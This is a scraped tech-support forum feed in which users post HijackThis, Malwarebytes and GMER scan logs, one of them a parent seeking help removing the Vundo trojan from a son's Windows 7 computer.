O4 - HKLM..\Run: [UIExec] "C:\Program Files (x86)\Celcom Broadband\UIExec.exe"
O4 - HKLM..\Run: [Windows Data Serivce] system32.exe
O4 - HKCU..\Run: [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\MESSEN~1\YahooMessenger.exe" -quiet
O4 - HKCU..\Run: [Facebook Update] "C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
O4 - HKCU..\Run: [LightShot] C:\Users\User\AppData\Local\Skillbrains\lightshot\LightShot.exe Flags: uninsdeletevalue
O4 - HKCU..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU..\Run: [GarenaPlus] "C:\Program Files (x86)\Garena Plus\GarenaMessenger.exe" -autolaunch
O4 - HKCU..\Run: [WebcamMaxAutoRun] "C:\Program Files (x86)\WebcamMax\wcmmon.exe" -a
O4 - HKCU..\Run: [Rfeiez] C:\Users\User\AppData\Roaming\Rfeiez.exe
O4 - HKUS\S-1-5-19..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS.DEFAULT..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O8 - Extra context menu item: Download all links with IDM - C:\Program Files (x86)\Internet Download Manager\IEGetAll.htm
O8 - Extra context menu item: Download with IDM - C:\Program Files (x86)\Internet Download Manager\IEExt.htm
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: (no name) - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll
O9 - Extra 'Tools' menuitem: Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll
O9 - Extra button: (no name) - {9819CC0E-9669-4D01-9CD7-2C66DA43AC6C} - (no file)
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Arp Intelligent Protection Service (AIPS) - Arcai.com - C:\Program Files (x86)\netcut\services\AIPS.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AtherosSvc - Atheros Commnucations - C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: Acer ePower Service (ePowerSvc) - Acer Incorporated - C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: FLEXnet Licensing Service 64 - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
O23 - Service: GamesAppService - WildTangent, Inc. - C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @C:\Program Files (x86)\Nero\Update\NASvc.exe,-200 (NAUpdate) - Nero AG - C:\Program Files (x86)\Nero\Update\NASvc.exe
O23 - Service: NitroPDFReaderDriverCreatorReadSpool2 (NitroReaderDriverReadSpool2) - Nitro PDF Software - C:\Program Files\Common Files\Nitro PDF\Reader\2.0\NitroPDFReaderDriverService2x64.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Overwolf Updater Service (OverwolfUpdaterService) - Overwolf Ltd - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: ScsiAccess - Unknown owner - C:\Program Files (x86)\Photodex\ProShow Producer\ScsiAccess.exe
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: SwitchBoard - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: TuneUp Utilities Service (TuneUp.UtilitiesSvc) - TuneUp Software - C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesService64.exe
O23 - Service: UI Assistant Service - Unknown owner - C:\Program Files (x86)\Celcom Broadband\AssistantServices.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe

--
End of file - 12844 bytes

]]> Viruses, Spyware and other Nasties hakka.tokumeino http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454876/ie-automaticlly-open-on-startup Vundo and maybe other issues http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/454849/vundo-and-maybe-other-issues Sat, 18 May 2013 03:13:06 +0000 I need to remove Vundo and potentially other issues from my son's computer. BTW **Do not allow your kids to play Pickle **as that seems to be where he got it. *sigh* I've followed all of the instructions from the "Read me before posting" instructions. Your help is much appreciated! ... I need to remove Vundo and potentially other issues from my son's computer. BTW **Do not allow your kids to play Pickle **as that seems to be where he got it. sigh

I've followed all of the instructions from the "Read me before posting" instructions. Your help is much appreciated!

'=========== malwarebytes log =========

Malwarebytes Anti-Malware (Trial) 1.75.0.1300
www.malwarebytes.org

Database version: v2013.05.17.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 10.0.9200.16576
Vincent :: VINCENT-PC [administrator]

Protection: Enabled

5/17/2013 8:47:49 PM
mbam-log-2013-05-17 (20-47-49).txt

Scan type: Full scan (C:\|)
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 375978
Time elapsed: 34 minute(s), 4 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0} (Trojan.Vundo) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0} (Trojan.Vundo) -> Quarantined and deleted successfully.

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

============ GMER One.log ===========
GMER 2.1.19163 - http://www.gmer.net
Rootkit scan 2013-05-17 20:20:14
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD1001FAES-75W7A0 rev.05.01D05 931.51GB
Running: fq2lk3vl.exe; Driver: C:\Users\Vincent\AppData\Local\Temp\uxriifog.sys


---- Threads - GMER 2.1 ----

Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3476]                                          0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3540]                                          0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3568]                                          000007fefb79d880
Thread   C:\Windows\System32\svchost.exe [3700:4476]                                                             000007fef0509688
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4152]                                          000007fefe5d0168
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:808]                                           000007fefbc72a7c
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4424]                                          000007feeab1d618
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:2104]                                          000007fefad35124
---- Processes - GMER 2.1 ----

Library  C:\Program Files\SUPERAntiSpyware\SASCTXMN64.DLL (*** suspicious ***) @ C:\Windows\Explorer.EXE [1896]  0000000002ee0000

---- EOF - GMER 2.1 ----


======== GMER Two.log ========

GMER 2.1.19163 - http://www.gmer.net
Rootkit scan 2013-05-17 20:39:58
Windows 6.1.7601 Service Pack 1 x64 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 WDC_WD1001FAES-75W7A0 rev.05.01D05 931.51GB
Running: fq2lk3vl.exe; Driver: C:\Users\Vincent\AppData\Local\Temp\uxriifog.sys


---- Threads - GMER 2.1 ----

Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3476]                                                                                                                                    0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3540]                                                                                                                                    0000000071b01dd4
Thread   C:\Program Files\Microsoft Device Center\itype.exe [3208:3568]                                                                                                                                    000007fefb79d880
Thread   C:\Windows\System32\svchost.exe [3700:4476]                                                                                                                                                       000007fef0509688
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4152]                                                                                                                                    000007fefe5d0168
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:808]                                                                                                                                     000007fefbc72a7c
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:4424]                                                                                                                                    000007feeab1d618
Thread   C:\Program Files\Windows Media Player\wmpnetwk.exe [2160:2104]                                                                                                                                    000007fefad35124
---- Processes - GMER 2.1 ----

Library  C:\Program Files\SUPERAntiSpyware\SASCTXMN64.DLL (*** suspicious ***) @ C:\Windows\Explorer.EXE [1896]                                                                                            0000000002ee0000

---- Registry - GMER 2.1 ----

Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Type                                                                                                                                              2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Start                                                                                                                                             2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@ErrorControl                                                                                                                                      1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@DisplayName                                                                                                                                       aswFsBlk
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Group                                                                                                                                             FSFilter Activity Monitor
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@DependOnService                                                                                                                                   FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Description                                                                                                                                       avast! mini-filter driver (aswFsBlk)
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk@Tag                                                                                                                                               3
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances                                                                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances@DefaultInstance                                                                                                                         aswFsBlk Instance
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances\aswFsBlk Instance                                                                                                                       
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances\aswFsBlk Instance@Altitude                                                                                                              388400
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk\Instances\aswFsBlk Instance@Flags                                                                                                                 0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswFsBlk                                                                                                                                                   
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Type                                                                                                                                             2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Start                                                                                                                                            2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@ErrorControl                                                                                                                                     1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@ImagePath                                                                                                                                        \??\C:\Windows\system32\drivers\aswMonFlt.sys
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@DisplayName                                                                                                                                      aswMonFlt
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Group                                                                                                                                            FSFilter Anti-Virus
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@DependOnService                                                                                                                                  FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt@Description                                                                                                                                      avast! mini-filter driver (aswMonFlt)
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances                                                                                                                                        
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances@DefaultInstance                                                                                                                        aswMonFlt Instance
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances\aswMonFlt Instance                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances\aswMonFlt Instance@Altitude                                                                                                            320700
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt\Instances\aswMonFlt Instance@Flags                                                                                                               0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswMonFlt                                                                                                                                                  
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Type                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Start                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@DisplayName                                                                                                                                         aswRdr
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Group                                                                                                                                               PNP_TDI
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@DependOnService                                                                                                                                     tcpip?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@Description                                                                                                                                         avast! WFP Redirect driver
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr@ImagePath                                                                                                                                           \SystemRoot\System32\Drivers\aswrdr2.sys
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr\Parameters                                                                                                                                          
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr\Parameters@MSIgnoreLSPDefault                                                                                                                       
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr\Parameters@WSIgnoreLSPDefault                                                                                                                       nl_lsp.dll,imon.dll,xfire_lsp.dll,mslsp.dll,mssplsp.dll,cwhook.dll,spi.dll,bmnet.dll,winsflt.dll
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRdr                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@Type                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@Start                                                                                                                                              0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@ErrorControl                                                                                                                                       1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@DisplayName                                                                                                                                        aswRvrt
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt@Description                                                                                                                                        avast! Revert
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters                                                                                                                                         
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@BootCounter                                                                                                                             14
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@TickCounter                                                                                                                             3373043
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@SystemRoot                                                                                                                              \Device\Harddisk0\Partition3\Windows
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt\Parameters@ImproperShutdown                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswRvrt                                                                                                                                                    
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Type                                                                                                                                                2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Start                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@DisplayName                                                                                                                                         aswSnx
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Group                                                                                                                                               FSFilter Virtualization
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@DependOnService                                                                                                                                     FltMgr?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Description                                                                                                                                         avast! virtualization driver (aswSnx)
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx@Tag                                                                                                                                                 2
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances                                                                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances@DefaultInstance                                                                                                                           aswSnx Instance
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances\aswSnx Instance                                                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances\aswSnx Instance@Altitude                                                                                                                  137600
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Instances\aswSnx Instance@Flags                                                                                                                     0
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Parameters                                                                                                                                          
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Parameters@ProgramFolder                                                                                                                            \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx\Parameters@DataFolder                                                                                                                               \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSnx                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@Type                                                                                                                                                 1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@Start                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@ErrorControl                                                                                                                                         1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@DisplayName                                                                                                                                          aswSP
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP@Description                                                                                                                                          avast! Self Protection
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters                                                                                                                                           
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@BehavShield                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@ProgramFolder                                                                                                                             \DosDevices\C:\Program Files\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@DataFolder                                                                                                                                \DosDevices\C:\ProgramData\AVAST Software\Avast
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@ProgramFilesFolder                                                                                                                        \DosDevices\C:\Program Files
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP\Parameters@GadgetFolder                                                                                                                              \DosDevices\C:\Program Files\Windows Sidebar\Shared Gadgets\aswSidebar.gadget
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswSP                                                                                                                                                      
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Type                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Start                                                                                                                                               1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@DisplayName                                                                                                                                         avast! Network Shield Support
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Group                                                                                                                                               PNP_TDI
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@DependOnService                                                                                                                                     tcpip?
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Description                                                                                                                                         avast! Network Shield TDI driver
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi@Tag                                                                                                                                                 12
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswTdi                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@Type                                                                                                                                                1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@Start                                                                                                                                               3
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@ErrorControl                                                                                                                                        1
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@DisplayName                                                                                                                                         aswVmm
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm@Description                                                                                                                                         avast! VM Monitor
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm\Parameters                                                                                                                                          
Reg      HKLM\SYSTEM\CurrentControlSet\services\aswVmm                                                                                                                                                     
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Type                                                                                                                                      32
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Start                                                                                                                                     2
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ErrorControl                                                                                                                              1
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ImagePath                                                                                                                                 "C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@DisplayName                                                                                                                               avast! Antivirus
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Group                                                                                                                                     ShellSvcGroup
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@DependOnService                                                                                                                           aswMonFlt?RpcSS?
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@WOW64                                                                                                                                     1
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ObjectName                                                                                                                                LocalSystem
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@ServiceSidType                                                                                                                            1
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus@Description                                                                                                                               Manages and implements avast! antivirus services for this computer. This includes the resident protection, the virus chest and the scheduler.
Reg      HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus                                                                                                                                           
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Type                                                                                                                                                  2
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Start                                                                                                                                                 2
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@ErrorControl                                                                                                                                          1
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@DisplayName                                                                                                                                           aswFsBlk
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Group                                                                                                                                                 FSFilter Activity Monitor
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@DependOnService                                                                                                                                       FltMgr?
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Description                                                                                                                                           avast! mini-filter driver (aswFsBlk)
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk@Tag                                                                                                                                                   3
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances (not active ControlSet)                                                                                                                     
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances@DefaultInstance                                                                                                                             aswFsBlk Instance
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances\aswFsBlk Instance (not active ControlSet)                                                                                                   
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances\aswFsBlk Instance@Altitude                                                                                                                  388400
Reg      HKLM\SYSTEM\ControlSet002\services\aswFsBlk\Instances\aswFsBlk Instance@Flags                                                                                                                     0
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Type                                                                                                                                                 2
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Start                                                                                                                                                2
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@ErrorControl                                                                                                                                         1
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@ImagePath                                                                                                                                            \??\C:\Windows\system32\drivers\aswMonFlt.sys
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@DisplayName                                                                                                                                          aswMonFlt
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Group                                                                                                                                                FSFilter Anti-Virus
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@DependOnService                                                                                                                                      FltMgr?
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt@Description                                                                                                                                          avast! mini-filter driver (aswMonFlt)
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances (not active ControlSet)                                                                                                                    
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances@DefaultInstance                                                                                                                            aswMonFlt Instance
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances\aswMonFlt Instance (not active ControlSet)                                                                                                 
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances\aswMonFlt Instance@Altitude                                                                                                                320700
Reg      HKLM\SYSTEM\ControlSet002\services\aswMonFlt\Instances\aswMonFlt Instance@Flags                                                                                                                   0
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Type                                                                                                                                                    1
Reg      HKLM\SYSTEM\ControlSet002\services\aswRdr@Start                                                                                                                                                   1
